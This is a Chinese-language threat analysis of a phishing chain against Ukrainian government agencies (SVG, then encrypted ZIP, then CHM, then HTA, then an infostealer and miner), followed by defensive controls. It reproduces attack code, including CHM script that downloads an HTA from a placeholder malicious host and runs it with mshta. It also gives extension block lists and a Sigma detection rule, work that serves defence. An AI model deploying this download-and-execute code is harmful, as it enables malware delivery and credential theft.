汕头模板做网站,北京快速网站建设,潍坊网站建设 马,制作网站注册页面摘要近年来#xff0c;攻击者持续利用文件格式特性规避传统安全检测机制。2025年9月#xff0c;Fortinet与BankInfoSecurity披露了一起针对乌克兰政府机构的定向钓鱼活动#xff0c;其核心特征在于使用可缩放矢量图形#xff08;Scalable Vector Graphics, SVG#xff09;…摘要近年来攻击者持续利用文件格式特性规避传统安全检测机制。2025年9月Fortinet与BankInfoSecurity披露了一起针对乌克兰政府机构的定向钓鱼活动其核心特征在于使用可缩放矢量图形Scalable Vector Graphics, SVG作为初始载体通过诱导用户打开伪装成“电子请求”的elektronni_zapit_NPU.svg文件触发多阶段恶意载荷投递链。该链条依次涉及浏览器重定向、密码保护ZIP压缩包下载、Compiled HTML HelpCHM文件执行并最终部署Amatera信息窃取器与PureMiner加密货币挖矿程序。本文系统剖析此攻击链的技术实现细节重点揭示SVG在现代邮件安全体系中的检测盲区、CHM文件的代码执行能力及其与HTML ApplicationHTA脚本宿主的协同滥用机制。在此基础上提出分层防御框架涵盖邮件网关策略强化、端点执行环境限制、沙箱行为增强及威胁狩猎指标构建。通过提供SVG内容解析、CHM行为模拟与自动化提取的代码示例本文为安全运维人员提供可操作的技术工具旨在提升对灰区文件格式攻击的识别与阻断能力。关键词SVGCHM多阶段攻击信息窃取邮件安全文件格式滥用威胁狩猎1 引言随着终端防护与网络边界安全能力的普遍提升攻击者日益倾向于利用合法但易被忽视的文件格式作为初始入侵载体。此类格式通常具备脚本执行、网络通信或文件系统交互能力却因历史用途“无害”而未被严格管控。可缩放矢量图形SVG即为典型代表——作为一种基于XML的开放标准图形格式SVG被广泛用于网页图标、数据可视化及文档嵌入主流浏览器均原生支持其渲染。然而其内嵌JavaScript的能力使其成为理想的攻击跳板。2025年第三季度针对乌克兰公共部门的钓鱼活动展示了这一趋势的最新演进。攻击者不再依赖传统Office宏或LNK快捷方式而是采用SVGZIPCHM的三段式投递链有效绕过基于静态签名与沙箱行为的传统检测。该攻击的成功依赖于三个关键因素1SVG在多数邮件安全策略中未被默认隔离2密码保护ZIP可阻止沙箱自动解压分析3CHM文件在Windows系统中默认关联hh.exe且其内部HTML可调用ActiveX与脚本引擎实现代码执行。本文聚焦于此攻击链逐层拆解其技术实现评估现有防御措施的失效原因并提出针对性缓解策略。研究不仅具有战术价值亦对理解高级持续性威胁APT如何利用“合法工具链”实施隐蔽渗透具有战略意义。2 攻击链技术剖析2.1 初始载体恶意SVG文件攻击以邮件附件形式投递名为elektronni_zapit_NPU.svg的文件伪装为乌克兰国家警察局NPU的电子请求。用户双击后系统调用默认浏览器如Chrome、Edge打开该SVG。SVG本质为文本文件其内容可包含script标签。示例如下!-- elektronni_zapit_NPU.svg --svg xmlnshttp://www.w3.org/2000/svg width400 height300rect x10 y10 width380 height280 fill#f0f0f0/text x200 y150 font-size16 text-anchormiddleЗавантаження документа... Будь ласка, зачекайте./textscript typeapplication/ecmascript![CDATA[window.location.href hxxps://malicious[.]xyz/download.html;]]/script/svg该脚本在SVG加载完成后立即执行将用户重定向至攻击者控制的下载页面。由于SVG由浏览器处理此行为不触发传统邮件客户端的附件执行告警。2.2 第二阶段伪装下载页与加密ZIP目标页面download.html模拟Adobe Reader加载界面显示乌克兰语文本“请等待您的文档正在加载”。同时页面自动触发ZIP文件下载!-- download.html --!DOCTYPE htmlhtmlheadmeta charsetutf-8titleЗавантаження/title/headbody stylebackground:#fff; text-align:center; padding-top:100px;h2Будь ласка, зачекайте, ваш документ завантажується.../h2pПароль: strong123456/strong/pscript// 延迟1秒后自动下载setTimeout(() {window.location.href document.zip;}, 1000);/script/body/html下载的document.zip受密码123456保护内含单一文件request.chm。由于沙箱通常无法获取解压密码静态分析与动态行为监控均失效。2.3 第三阶段CHM执行与载荷释放用户手动解压并双击request.chm系统调用hh.exeHTML Help Executable打开。CHM文件实为编译后的HTML集合其index.html可包含恶意脚本!-- index.html inside CHM --htmlheadtitleЕлектронний запит/title/headbodyh1Запит отримано/h1pОбробка триває.../pscriptvar fso new ActiveXObject(Scripting.FileSystemObject);var shell new ActiveXObject(WScript.Shell);// 从远程服务器下载HTA载荷var xhr new ActiveXObject(MSXML2.XMLHTTP);xhr.open(GET, hxxps://malicious[.]xyz/loader.hta, false);xhr.send();// 写入临时目录var tempPath shell.ExpandEnvironmentStrings(%TEMP%) \\update.hta;var file fso.CreateTextFile(tempPath, true);file.Write(xhr.responseText);file.Close();// 执行HTA即CountLoadershell.Run(mshta.exe tempPath , 0, false);// 关闭CHM窗口可选window.close();/script/body/html此处利用了CHM对ActiveX对象的支持在本地上下文中默认启用通过MSXML2.XMLHTTP下载远程HTA文件并使用WScript.Shell执行mshta.exe。HTAHTML Application作为Windows遗留脚本宿主可直接调用COM对象实现无文件或低文件落地的恶意行为。2.4 最终载荷Amatera与PureMinerloader.hta即CountLoader进一步解密并加载两个主要模块Amatera Stealer窃取浏览器Cookie、保存的密码、加密货币钱包等PureMiner部署XMRig挖矿程序利用CPU资源进行门罗币挖掘。整个链条无直接可执行文件.exe落地依赖合法系统组件浏览器、hh.exe、mshta.exe完成攻击极大降低EDR告警概率。3 现有防御体系的失效分析3.1 邮件网关策略盲区多数企业邮件安全网关如Proofpoint、Mimecast默认允许SVG附件通行因其被视为“静态图像”。即使启用URL重写SVG内部的window.location重定向发生在客户端无法被网关拦截。3.2 沙箱分析局限商业沙箱在处理加密ZIP时面临两难若不解压则无法分析内部CHM若尝试暴力破解或OCR识别密码成功率低且耗时易被攻击者通过延迟触发规避。此外CHM在沙箱中常因权限限制无法调用WScript.Shell导致行为未被记录。3.3 端点执行环境宽松Windows默认将.chm关联至hh.exe且未禁用其脚本执行能力。尽管微软自Windows 10起限制CHM从互联网区域运行脚本但若用户从本地磁盘如Downloads文件夹打开仍处于“本地Intranet”或“Trusted Sites”区域脚本执行不受限。4 分层防御策略4.1 邮件层强制隔离高风险格式建议在邮件网关配置中显式阻止或隔离以下扩展名.svg, .chm, .hta, .js, .vbs, .wsf密码保护的.zip, .rar, .7z示例Exchange Online Protection PowerShell# 创建恶意附件过滤规则New-MalwareFilterPolicy -Name BlockHighRiskAttachments -EnableInternalSenderAdminNotifications $true -Action DeleteMessageNew-MalwareFilterRule -Name BlockHighRiskAttachmentsRule -Priority 1 -MalwareFilterPolicy BlockHighRiskAttachments -AttachmentExtensionBlackList (.svg, .chm, .hta, .js, .zip)注实际部署中可将.zip设为“隔离审查”而非直接删除结合后续分析。4.2 端点层禁用危险执行宿主通过组策略GPO或MDM禁用CHM与旧式脚本引擎; GPO路径计算机配置 → 管理模板 → Windows组件 → HTML帮助; 策略禁止HTML帮助内容运行脚本Enabled 1; 禁用mshta.exe谨慎评估业务影响[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\mshta.exe]Disabledword:00000001或使用AppLocker规则阻止非授权CHM执行AppLockerPolicy Version1RuleCollection TypeExe EnforcementModeAuditOnlyFilePublisherRule IdBlock_CHM NameBlock CHM Execution Description UserOrGroupSidS-1-1-0 ActionDenyConditionsFilePathCondition Path%OSDRIVE%\*.chm //Conditions/FilePublisherRule/RuleCollection/AppLockerPolicy4.3 沙箱增强延迟解压与行为诱饵对于加密压缩包可部署具备以下能力的增强沙箱自动提取页面中明文显示的密码如上述pПароль: 123456/p模拟用户交互点击、输入以触发延迟下载监控hh.exe与mshta.exe的子进程创建。以下Python脚本演示从HTML中提取密码并解压ZIPimport reimport zipfilefrom bs4 import BeautifulSoupdef extract_password_from_html(html_content):# 匹配常见密码提示模式支持多语言patterns [rpassword[:\s]*([a-zA-Z0-9!#$%^*()_]{4,12}),rпароль[:\s]*([a-zA-Z0-9!#$%^*()_]{4,12}),rclave[:\s]*([a-zA-Z0-9!#$%^*()_]{4,12})]for pattern in patterns:match re.search(pattern, html_content, re.IGNORECASE)if match:return match.group(1)return Nonedef safe_extract_zip(zip_path, html_path):with open(html_path, r, encodingutf-8) as f:html f.read()password extract_password_from_html(html)if not password:print(No password found in HTML.)return Falsetry:with zipfile.ZipFile(zip_path) as zf:zf.extractall(pwdpassword.encode())print(fSuccessfully extracted with password: {password})return Trueexcept RuntimeError as e:print(fExtraction failed: {e})return False# 使用示例safe_extract_zip(document.zip, download.html)4.4 威胁狩猎IOC聚合与基础设施关联安全团队应聚焦以下指标开展狩猎下载域名家族如*.xyz, *.top中近期注册的仿冒域名CHM与HTA文件的哈希值mshta.exe启动hh.exe或从临时目录加载脚本的进程链。Sigma规则示例检测可疑CHM执行title: Suspicious CHM File Executionstatus: experimentaldescription: Detects execution of .chm files from user Downloads or Temp directories.logsource:category: process_creationproduct: windowsdetection:selection:Image|endswith: \hh.exeCommandLine|contains:- \Downloads\- \Temp\- \AppData\Local\condition: selectionfalsepositives:- Legitimate help documentation (rare in modern enterprise)level: high5 讨论本攻击链凸显了“合法工具滥用”Living-off-the-Land, LotL策略的持续有效性。SVG、CHM、HTA均为系统原生支持的格式其功能设计初衷并非恶意却因安全策略滞后而成为攻击通道。防御的关键在于重新评估文件格式的风险属性而非仅依赖其历史用途。此外攻击者对用户心理的精准操控伪造官方通知、制造法律压力、提供明文密码表明技术防御必须与安全意识培训协同。然而仅靠培训不足以应对高度逼真的社会工程自动化策略阻断仍是根本。6 结论针对乌克兰的SVG钓鱼攻击展示了现代恶意软件投递链的复杂性与隐蔽性。通过结合灰区文件格式、加密规避与系统合法组件攻击者成功绕过多层次防御。本文通过拆解SVG→ZIP→CHM→HTA→载荷的完整链条揭示了各环节的技术细节与防御失效点并提出从邮件隔离、端点加固、沙箱增强到威胁狩猎的综合对策。代码示例验证了密码提取、行为检测等关键技术的可行性。未来防御体系需建立动态文件风险评估机制将“无害”格式纳入持续监控范畴方能有效应对不断演化的投递技术。安全的本质不在于信任格式而在于验证行为。编辑芦笛公共互联网反网络钓鱼工作组